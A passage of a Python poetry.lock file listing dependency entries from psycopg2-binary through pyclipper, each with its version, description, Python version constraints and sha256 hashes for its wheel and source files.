"psycopg2_binary-2.9.9-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ead20f7913a9c1e894aebe47cccf9dc834e1618b7aa96155d2091a626e59c972"}, {file = "psycopg2_binary-2.9.9-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:ca49a8119c6cbd77375ae303b0cfd8c11f011abbbd64601167ecca18a87e7cdd"}, {file = "psycopg2_binary-2.9.9-cp38-cp38-musllinux_1_1_i686.whl", hash = 
"sha256:323ba25b92454adb36fa425dc5cf6f8f19f78948cbad2e7bc6cdf7b0d7982e59"}, {file = "psycopg2_binary-2.9.9-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:1236ed0952fbd919c100bc839eaa4a39ebc397ed1c08a97fc45fee2a595aa1b3"}, {file = "psycopg2_binary-2.9.9-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:729177eaf0aefca0994ce4cffe96ad3c75e377c7b6f4efa59ebf003b6d398716"}, {file = "psycopg2_binary-2.9.9-cp38-cp38-win32.whl", hash = "sha256:804d99b24ad523a1fe18cc707bf741670332f7c7412e9d49cb5eab67e886b9b5"}, {file = "psycopg2_binary-2.9.9-cp38-cp38-win_amd64.whl", hash = "sha256:a6cdcc3ede532f4a4b96000b6362099591ab4a3e913d70bcbac2b56c872446f7"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:72dffbd8b4194858d0941062a9766f8297e8868e1dd07a7b36212aaa90f49472"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:30dcc86377618a4c8f3b72418df92e77be4254d8f89f14b8e8f57d6d43603c0f"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:31a34c508c003a4347d389a9e6fcc2307cc2150eb516462a7a17512130de109e"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:15208be1c50b99203fe88d15695f22a5bed95ab3f84354c494bcb1d08557df67"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1873aade94b74715be2246321c8650cabf5a0d098a95bab81145ffffa4c13876"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3a58c98a7e9c021f357348867f537017057c2ed7f77337fd914d0bedb35dace7"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:4686818798f9194d03c9129a4d9a702d9e113a89cb03bffe08c6cf799e053291"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:ebdc36bea43063116f0486869652cb2ed7032dbc59fbcb4445c4862b5c1ecf7f"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:ca08decd2697fdea0aea364b370b1249d47336aec935f87b8bbfd7da5b2ee9c1"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:ac05fb791acf5e1a3e39402641827780fe44d27e72567a000412c648a85ba860"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-win32.whl", hash = "sha256:9dba73be7305b399924709b91682299794887cbbd88e38226ed9f6712eabee90"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-win_amd64.whl", hash = "sha256:f7ae5d65ccfbebdfa761585228eb4d0df3a8b15cfb53bd953e713e09fbb12957"}, ] [[package]] name = "ptyprocess" version = "0.7.0" description = "Run a subprocess in a pseudo terminal" optional = false python-versions = "*" files = [ {file = "ptyprocess-0.7.0-py2.py3-none-any.whl", hash = "sha256:4b41f3967fce3af57cc7e94b888626c18bf37a083e3651ca8feeb66d492fef35"}, {file = "ptyprocess-0.7.0.tar.gz", hash = "sha256:5c5d0a3b48ceee0b48485e0c26037c0acd7d29765ca3fbb5cb3831d347423220"}, ] [[package]] name = "pure-eval" version = "0.2.2" description = "Safely evaluate AST nodes without side effects" optional = false python-versions = "*" files = [ {file = "pure_eval-0.2.2-py3-none-any.whl", hash = "sha256:01eaab343580944bc56080ebe0a674b39ec44a945e6d09ba7db3cb8cec289350"}, {file = "pure_eval-0.2.2.tar.gz", hash = "sha256:2b45320af6dfaa1750f543d714b6d1c520a1688dec6fd24d339063ce0aaa9ac3"}, ] [package.extras] tests = ["pytest"] [[package]] name = "py" version = "1.11.0" description = "library with cross-python path, ini-parsing, io, code, log facilities" optional = true python-versions = ">=2.7, !=3.0.*, 
!=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" files = [ {file = "py-1.11.0-py2.py3-none-any.whl", hash = "sha256:607c53218732647dff4acdfcd50cb62615cedf612e72d1724fb1a0cc6405b378"}, {file = "py-1.11.0.tar.gz", hash = "sha256:51c75c4126074b472f746a24399ad32f6053d1b34b68d2fa41e558e6f4a98719"}, ] [[package]] name = "py-trello" version = "0.19.0" description = "Python wrapper around the Trello API" optional = true python-versions = "*" files = [ {file = "py-trello-0.19.0.tar.gz", hash = "sha256:f4a8c05db61fad0ef5fa35d62c29806c75d9d2b797358d9cf77275e2cbf23020"}, ] [package.dependencies] python-dateutil = "*" pytz = "*" requests = "*" requests-oauthlib = ">=0.4.1" [[package]] name = "py4j" version = "0.10.9.7" description = "Enables Python programs to dynamically access arbitrary Java objects" optional = true python-versions = "*" files = [ {file = "py4j-0.10.9.7-py2.py3-none-any.whl", hash = "sha256:85defdfd2b2376eb3abf5ca6474b51ab7e0de341c75a02f46dc9b5976f5a5c1b"}, {file = "py4j-0.10.9.7.tar.gz", hash = "sha256:0b6e5315bb3ada5cf62ac651d107bb2ebc02def3dee9d9548e3baac644ea8dbb"}, ] [[package]] name = "pyaes" version = "1.6.1" description = "Pure-Python Implementation of the AES block-cipher and common modes of operation" optional = true python-versions = "*" files = [ {file = "pyaes-1.6.1.tar.gz", hash = "sha256:02c1b1405c38d3c370b085fb952dd8bea3fadcee6411ad99f312cc129c536d8f"}, ] [[package]] name = "pyarrow" version = "13.0.0" description = "Python library for Apache Arrow" optional = true python-versions = ">=3.8" files = [ {file = "pyarrow-13.0.0-cp310-cp310-macosx_10_14_x86_64.whl", hash = "sha256:1afcc2c33f31f6fb25c92d50a86b7a9f076d38acbcb6f9e74349636109550148"}, {file = "pyarrow-13.0.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:70fa38cdc66b2fc1349a082987f2b499d51d072faaa6b600f71931150de2e0e3"}, {file = "pyarrow-13.0.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cd57b13a6466822498238877892a9b287b0a58c2e81e4bdb0b596dbb151cbb73"}, {file = "pyarrow-13.0.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f8ce69f7bf01de2e2764e14df45b8404fc6f1a5ed9871e8e08a12169f87b7a26"}, {file = "pyarrow-13.0.0-cp310-cp310-manylinux_2_28_aarch64.whl", hash = "sha256:588f0d2da6cf1b1680974d63be09a6530fd1bd825dc87f76e162404779a157dc"}, {file = "pyarrow-13.0.0-cp310-cp310-manylinux_2_28_x86_64.whl", hash = "sha256:6241afd72b628787b4abea39e238e3ff9f34165273fad306c7acf780dd850956"}, {file = "pyarrow-13.0.0-cp310-cp310-win_amd64.whl", hash = "sha256:fda7857e35993673fcda603c07d43889fca60a5b254052a462653f8656c64f44"}, {file = "pyarrow-13.0.0-cp311-cp311-macosx_10_14_x86_64.whl", hash = "sha256:aac0ae0146a9bfa5e12d87dda89d9ef7c57a96210b899459fc2f785303dcbb67"}, {file = "pyarrow-13.0.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:d7759994217c86c161c6a8060509cfdf782b952163569606bb373828afdd82e8"}, {file = "pyarrow-13.0.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:868a073fd0ff6468ae7d869b5fc1f54de5c4255b37f44fb890385eb68b68f95d"}, {file = "pyarrow-13.0.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:51be67e29f3cfcde263a113c28e96aa04362ed8229cb7c6e5f5c719003659d33"}, {file = "pyarrow-13.0.0-cp311-cp311-manylinux_2_28_aarch64.whl", hash = "sha256:d1b4e7176443d12610874bb84d0060bf080f000ea9ed7c84b2801df851320295"}, {file = "pyarrow-13.0.0-cp311-cp311-manylinux_2_28_x86_64.whl", hash = "sha256:69b6f9a089d116a82c3ed819eea8fe67dae6105f0d81eaf0fdd5e60d0c6e0944"}, {file = 
"pyarrow-13.0.0-cp311-cp311-win_amd64.whl", hash = "sha256:ab1268db81aeb241200e321e220e7cd769762f386f92f61b898352dd27e402ce"}, {file = "pyarrow-13.0.0-cp38-cp38-macosx_10_14_x86_64.whl", hash = "sha256:ee7490f0f3f16a6c38f8c680949551053c8194e68de5046e6c288e396dccee80"}, {file = "pyarrow-13.0.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:e3ad79455c197a36eefbd90ad4aa832bece7f830a64396c15c61a0985e337287"}, {file = "pyarrow-13.0.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:68fcd2dc1b7d9310b29a15949cdd0cb9bc34b6de767aff979ebf546020bf0ba0"}, {file = "pyarrow-13.0.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dc6fd330fd574c51d10638e63c0d00ab456498fc804c9d01f2a61b9264f2c5b2"}, {file = "pyarrow-13.0.0-cp38-cp38-manylinux_2_28_aarch64.whl", hash = "sha256:e66442e084979a97bb66939e18f7b8709e4ac5f887e636aba29486ffbf373763"}, {file = "pyarrow-13.0.0-cp38-cp38-manylinux_2_28_x86_64.whl", hash = "sha256:0f6eff839a9e40e9c5610d3ff8c5bdd2f10303408312caf4c8003285d0b49565"}, {file = "pyarrow-13.0.0-cp38-cp38-win_amd64.whl", hash = "sha256:8b30a27f1cddf5c6efcb67e598d7823a1e253d743d92ac32ec1eb4b6a1417867"}, {file = "pyarrow-13.0.0-cp39-cp39-macosx_10_14_x86_64.whl", hash = "sha256:09552dad5cf3de2dc0aba1c7c4b470754c69bd821f5faafc3d774bedc3b04bb7"}, {file = "pyarrow-13.0.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:3896ae6c205d73ad192d2fc1489cd0edfab9f12867c85b4c277af4d37383c18c"}, {file = "pyarrow-13.0.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6647444b21cb5e68b593b970b2a9a07748dd74ea457c7dadaa15fd469c48ada1"}, {file = "pyarrow-13.0.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:47663efc9c395e31d09c6aacfa860f4473815ad6804311c5433f7085415d62a7"}, {file = "pyarrow-13.0.0-cp39-cp39-manylinux_2_28_aarch64.whl", hash = "sha256:b9ba6b6d34bd2563345488cf444510588ea42ad5613df3b3509f48eb80250afd"}, {file = "pyarrow-13.0.0-cp39-cp39-manylinux_2_28_x86_64.whl", hash = "sha256:d00d374a5625beeb448a7fa23060df79adb596074beb3ddc1838adb647b6ef09"}, {file = "pyarrow-13.0.0-cp39-cp39-win_amd64.whl", hash = "sha256:c51afd87c35c8331b56f796eff954b9c7f8d4b7fef5903daf4e05fcf017d23a8"}, {file = "pyarrow-13.0.0.tar.gz", hash = "sha256:83333726e83ed44b0ac94d8d7a21bbdee4a05029c3b1e8db58a863eec8fd8a33"}, ] [package.dependencies] numpy = ">=1.16.6" [[package]] name = "pyasn1" version = "0.5.0" description = "Pure-Python implementation of ASN.1 types and DER/BER/CER codecs (X.208)" optional = true python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,>=2.7" files = [ {file = "pyasn1-0.5.0-py2.py3-none-any.whl", hash = "sha256:87a2121042a1ac9358cabcaf1d07680ff97ee6404333bacca15f76aa8ad01a57"}, {file = "pyasn1-0.5.0.tar.gz", hash = "sha256:97b7290ca68e62a832558ec3976f15cbf911bf5d7c7039d8b861c2a0ece69fde"}, ] [[package]] name = "pyasn1-modules" version = "0.3.0" description = "A collection of ASN.1-based protocols modules" optional = true python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,>=2.7" files = [ {file = "pyasn1_modules-0.3.0-py2.py3-none-any.whl", hash = "sha256:d3ccd6ed470d9ffbc716be08bd90efbd44d0734bc9303818f7336070984a162d"}, {file = "pyasn1_modules-0.3.0.tar.gz", hash = "sha256:5bd01446b736eb9d31512a30d46c1ac3395d676c6f3cafa4c03eb54b9925631c"}, ] [package.dependencies] pyasn1 = ">=0.4.6,<0.6.0" [[package]] name = "pycares" version = "4.4.0" description = "Python interface for c-ares" optional = true python-versions = ">=3.8" files = [ {file = 
"pycares-4.4.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:24da119850841d16996713d9c3374ca28a21deee056d609fbbed29065d17e1f6"}, {file = "pycares-4.4.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:8f64cb58729689d4d0e78f0bfb4c25ce2f851d0274c0273ac751795c04b8798a"}, {file = "pycares-4.4.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d33e2a1120887e89075f7f814ec144f66a6ce06a54f5722ccefc62fbeda83cff"}, {file = "pycares-4.4.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c680fef1b502ee680f8f0b95a41af4ec2c234e50e16c0af5bbda31999d3584bd"}, {file = "pycares-4.4.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:fff16b09042ba077f7b8aa5868d1d22456f0002574d0ba43462b10a009331677"}, {file = "pycares-4.4.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:229a1675eb33bc9afb1fc463e73ee334950ccc485bc83a43f6ae5839fb4d5fa3"}, {file = "pycares-4.4.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:3aebc73e5ad70464f998f77f2da2063aa617cbd8d3e8174dd7c5b4518f967153"}, {file = "pycares-4.4.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:6ef64649eba56448f65e26546d85c860709844d2fc22ef14d324fe0b27f761a9"}, {file = "pycares-4.4.0-cp310-cp310-win32.whl", hash = "sha256:4afc2644423f4eef97857a9fd61be9758ce5e336b4b0bd3d591238bb4b8b03e0"}, {file = "pycares-4.4.0-cp310-cp310-win_amd64.whl", hash = "sha256:5ed4e04af4012f875b78219d34434a6d08a67175150ac1b79eb70ab585d4ba8c"}, {file = "pycares-4.4.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:bce8db2fc6f3174bd39b81405210b9b88d7b607d33e56a970c34a0c190da0490"}, {file = "pycares-4.4.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:9a0303428d013ccf5c51de59c83f9127aba6200adb7fd4be57eddb432a1edd2a"}, {file = "pycares-4.4.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:afb91792f1556f97be7f7acb57dc7756d89c5a87bd8b90363a77dbf9ea653817"}, {file = "pycares-4.4.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b61579cecf1f4d616e5ea31a6e423a16680ab0d3a24a2ffe7bb1d4ee162477ff"}, {file = "pycares-4.4.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:b7af06968cbf6851566e806bf3e72825b0e6671832a2cbe840be1d2d65350710"}, {file = "pycares-4.4.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:ceb12974367b0a68a05d52f4162b29f575d241bd53de155efe632bf2c943c7f6"}, {file = "pycares-4.4.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:2eeec144bcf6a7b6f2d74d6e70cbba7886a84dd373c886f06cb137a07de4954c"}, {file = "pycares-4.4.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:e3a6f7cfdfd11eb5493d6d632e582408c8f3b429f295f8799c584c108b28db6f"}, {file = "pycares-4.4.0-cp311-cp311-win32.whl", hash = "sha256:34736a2ffaa9c08ca9c707011a2d7b69074bbf82d645d8138bba771479b2362f"}, {file = "pycares-4.4.0-cp311-cp311-win_amd64.whl", hash = "sha256:eb66c30eb11e877976b7ead13632082a8621df648c408b8e15cdb91a452dd502"}, {file = "pycares-4.4.0-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:fd644505a8cfd7f6584d33a9066d4e3d47700f050ef1490230c962de5dfb28c6"}, {file = "pycares-4.4.0-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:52084961262232ec04bd75f5043aed7e5d8d9695e542ff691dfef0110209f2d4"}, {file = "pycares-4.4.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a0c5368206057884cde18602580083aeaad9b860e2eac14fd253543158ce1e93"}, {file = 
"pycares-4.4.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:112a4979c695b1c86f6782163d7dec58d57a3b9510536dcf4826550f9053dd9a"}, {file = "pycares-4.4.0-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8d186dafccdaa3409194c0f94db93c1a5d191145a275f19da6591f9499b8e7b8"}, {file = "pycares-4.4.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:64965dc19c578a683ea73487a215a8897276224e004d50eeb21f0bc7a0b63c88"}, {file = "pycares-4.4.0-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:ed2a38e34bec6f2586435f6ff0bc5fe11d14bebd7ed492cf739a424e81681540"}, {file = "pycares-4.4.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:94d6962db81541eb0396d2f0dfcbb18cdb8c8b251d165efc2d974ae652c547d4"}, {file = "pycares-4.4.0-cp312-cp312-win32.whl", hash = "sha256:1168a48a834813aa80f412be2df4abaf630528a58d15c704857448b20b1675c0"}, {file = "pycares-4.4.0-cp312-cp312-win_amd64.whl", hash = "sha256:db24c4e7fea4a052c6e869cbf387dd85d53b9736cfe1ef5d8d568d1ca925e977"}, {file = "pycares-4.4.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:21a5a0468861ec7df7befa69050f952da13db5427ae41ffe4713bc96291d1d95"}, {file = "pycares-4.4.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:22c00bf659a9fa44d7b405cf1cd69b68b9d37537899898d8cbe5dffa4016b273"}, {file = "pycares-4.4.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:23aa3993a352491a47fcf17867f61472f32f874df4adcbb486294bd9fbe8abee"}, {file = "pycares-4.4.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:813d661cbe2e37d87da2d16b7110a6860e93ddb11735c6919c8a3545c7b9c8d8"}, {file = "pycares-4.4.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:77cf5a2fd5583c670de41a7f4a7b46e5cbabe7180d8029f728571f4d2e864084"}, {file = "pycares-4.4.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:3eaa6681c0a3e3f3868c77aca14b7760fed35fdfda2fe587e15c701950e7bc69"}, {file = "pycares-4.4.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:ad58e284a658a8a6a84af2e0b62f2f961f303cedfe551854d7bd40c3cbb61912"}, {file = "pycares-4.4.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:bfb89ca9e3d0a9b5332deeb666b2ede9d3469107742158f4aeda5ce032d003f4"}, {file = "pycares-4.4.0-cp38-cp38-win32.whl", hash = "sha256:f36bdc1562142e3695555d2f4ac0cb69af165eddcefa98efc1c79495b533481f"}, {file = "pycares-4.4.0-cp38-cp38-win_amd64.whl", hash = "sha256:902461a92b6a80fd5041a2ec5235680c7cc35e43615639ec2a40e63fca2dfb51"}, {file = "pycares-4.4.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:7bddc6adba8f699728f7fc1c9ce8cef359817ad78e2ed52b9502cb5f8dc7f741"}, {file = "pycares-4.4.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:cb49d5805cd347c404f928c5ae7c35e86ba0c58ffa701dbe905365e77ce7d641"}, {file = "pycares-4.4.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:56cf3349fa3a2e67ed387a7974c11d233734636fe19facfcda261b411af14d80"}, {file = "pycares-4.4.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8bf2eaa83a5987e48fa63302f0fe7ce3275cfda87b34d40fef9ce703fb3ac002"}, {file = "pycares-4.4.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:82bba2ab77eb5addbf9758d514d9bdef3c1bfe7d1649a47bd9a0d55a23ef478b"}, {file = "pycares-4.4.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:c6a8bde63106f162fca736e842a916853cad3c8d9d137e11c9ffa37efa818b02"}, {file = 
"pycares-4.4.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:f5f646eec041db6ffdbcaf3e0756fb92018f7af3266138c756bb09d2b5baadec"}, {file = "pycares-4.4.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:9dc04c54c6ea615210c1b9e803d0e2d2255f87a3d5d119b6482c8f0dfa15b26b"}, {file = "pycares-4.4.0-cp39-cp39-win32.whl", hash = "sha256:97892cced5794d721fb4ff8765764aa4ea48fe8b2c3820677505b96b83d4ef47"}, {file = "pycares-4.4.0-cp39-cp39-win_amd64.whl", hash = "sha256:917f08f0b5d9324e9a34211e68d27447c552b50ab967044776bbab7e42a553a2"}, {file = "pycares-4.4.0.tar.gz", hash = "sha256:f47579d508f2f56eddd16ce72045782ad3b1b3b678098699e2b6a1b30733e1c2"}, ] [package.dependencies] cffi = ">=1.5.0" [package.extras] idna = ["idna (>=2.1)"] [[package]] name = "pyclipper" version = "1.3.0.post5" description = "Cython wrapper for the C++ translation of the Angus Johnson's Clipper library (ver. 6.4.2)" optional = true python-versions = "*" files = [ {file = "pyclipper-1.3.0.post5-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:3c45f99b8180dd4df4c86642657ca92b7d5289a5e3724521822e0f9461961fe2"}, {file = "pyclipper-1.3.0.post5-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:567ffd419a0bdc3727fa4562cfa1f18484691817a2bc0bc675750aa28ed98bd4"}, {file = "pyclipper-1.3.0.post5-cp310-cp310-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:59c8c75661a6d87e98b1655851578a2917d3c8859912c9a4f1956b9830940fd9"}, {file = "pyclipper-1.3.0.post5-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a496efa146d2d88b59350021739e4685e439dc569b6654e9e6d5e42e9a0b1666"}, {file = "pyclipper-1.3.0.post5-cp310-cp310-win32.whl", hash = "sha256:02a98d09af9b60bcf8e9480d153c0839e20b92689f5602f87242a4933842fecd"}, {file = "pyclipper-1.3.0.post5-cp310-cp310-win_amd64.whl", hash = "sha256:847f1e2fc3994bb498fe675f55c98129b95dc26a5c92304ba4cf0ab40721ea3d"}, {file = "pyclipper-1.3.0.post5-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:b7a983ae019932bfa0a1971a2dc8c856704add5f3d567bed8fac02dbc0e7f0bf"}, {file = "pyclipper-1.3.0.post5-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:d8760075c395b924f894aa16ee06e8c040c6f9b63e0903e49de3cc8d82d9e637"}, {file = "pyclipper-1.3.0.post5-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e4ea61ca5899d3346c614951342c506f119601ed0a1f4889a9cc236558afec6b"}, {file = "pyclipper-1.3.0.post5-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:46499b361ae067662b22578401d83d57716f3cc0071d592feb07d504b439fea7"}, {file = "pyclipper-1.3.0.post5-cp311-cp311-win32.whl", hash = "sha256:d5c77e39ab05a6cf277c819639968b21e6959e996ea1a074afc24236541708ff"}, {file = "pyclipper-1.3.0.post5-cp311-cp311-win_amd64.whl", hash = "sha256:0f78a1c18ff4f9276f78d9353d6ed4309c3886a9d0172437e48328aef499165e"}, {file = "pyclipper-1.3.0.post5-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:5237282f906049c307e6c90333c7d56f6b8712bf087ef97b141830c40b09ca0a"}, {file = "pyclipper-1.3.0.post5-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:aca8635573646b65c054399433fb3493637f1445db942de8a52fca9ef493ba3d"}, {file = "pyclipper-1.3.0.post5-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1158a2b13d59bdfab33d1d928f7b72c8c7fb8a76e7d2283839cb45d7c0ff2140"}, {file = "pyclipper-1.3.0.post5-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5a041f1a7982b17cf92fd3be349ec41ff1901792149c166bf283f469567b52d6"}, {file = "pyclipper-1.3.0.post5-cp312-cp312-win32.whl", hash = 
"sha256:bf3a2ccd6e4e078250b0a31a12c519b0be6d1bc160acfceee62407dbd68558f6"}, {file = "pyclipper-1.3.0.post5-cp312-cp312-win_amd64.whl", hash = "sha256:2ce6e0a6ab32182c26537965cf521822cd11a28a7ffcef48635a94c6ca8559ef"}, {file = "pyclipper-1.3.0.post5-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:010ee13d40d924341cc41b6d9901d763175040c68753939f140bc0cc714f18bb"}, {file = "pyclipper-1.3.0.post5-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ee1c4797b1dc982ae9d60333269536ea03ddc0baa1c3383a6d5b741dbbb12675"}, {file = "pyclipper-1.3.0.post5-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:ba692cf11873886085a0445dcfc362b24ca35bcb997ad9e9b5685854a290d8ff"}, {file = "pyclipper-1.3.0.post5-cp36-cp36m-win32.whl", hash = "sha256:f0b84fcf5230aca2de06ddb7920459daa858853835f8774739ca30dd516e7d37"}, {file = "pyclipper-1.3.0.post5-cp36-cp36m-win_amd64.whl", hash = "sha256:741910bfd7b0bd40f027869f4bf86bdd9678ae7f74e8dabcf62d170269f6191d"}, {file = "pyclipper-1.3.0.post5-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:5f3484b4dffa64f0e3a43b63165a5c0f507c5850e70b9cc2eaa82474d7746393"}, {file = "pyclipper-1.3.0.post5-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:87efec9795744cef786f2f8cab17d6dc07f57dfce5e3b7f3be96eb79a4ce5794"}, {file = "pyclipper-1.3.0.post5-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:5f445a2d03690faa23a1b90e32dfb4352a60b23437323de87388c6c611d3d1e3"}, {file = "pyclipper-1.3.0.post5-cp37-cp37m-win32.whl", hash = "sha256:eb9d1cb2999bc1ea8ad1c3a031ba33b0a89a5ace25d33df7529d3ff18c16604c"}, {file = "pyclipper-1.3.0.post5-cp37-cp37m-win_amd64.whl", hash = "sha256:ead0f3ecd1961005f61d50c896e33442138b4e7c9e0c035784d3525068dd2b10"}, {file = "pyclipper-1.3.0.post5-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:39ccd920b192a4f8096589a2a1f8faaf6aaaadb7a163b5ce913d03faac2449bb"}, {file = "pyclipper-1.3.0.post5-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:e346e7adba43e40f5f5f293b6b6a45de5a6a3bdc74e437dedd948c5d74de9405"}, {file = "pyclipper-1.3.0.post5-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bb2fb22927c3ac3191e555efd335c6efa819aa1ff4d0901979673ab5a18eb740"}, {file = "pyclipper-1.3.0.post5-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:a678999d728023f1f3988a14a2e6d89d6f1ed4d0786d5992c1bffb4c1ab30318"}, {file = "pyclipper-1.3.0.post5-cp38-cp38-win32.whl", hash = "sha256:36d456fdf32a6410a87bd7af8ebc4c01f19b4e3b839104b3072558cad0d8bf4c"}, {file = "pyclipper-1.3.0.post5-cp38-cp38-win_amd64.whl", hash = "sha256:c9c1fdf4ecae6b55033ede3f4e931156ffc969334300f44f8bf1b356ec0a3d63"}, {file = "pyclipper-1.3.0.post5-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:8bb9cd95fd4bd88fb1590d1763a52e3ea6a1095e11b3e885ff164da1313aae79"}, {file = "pyclipper-1.3.0.post5-cp39-cp39-macosx_10_9_x86_64.whl", hash = 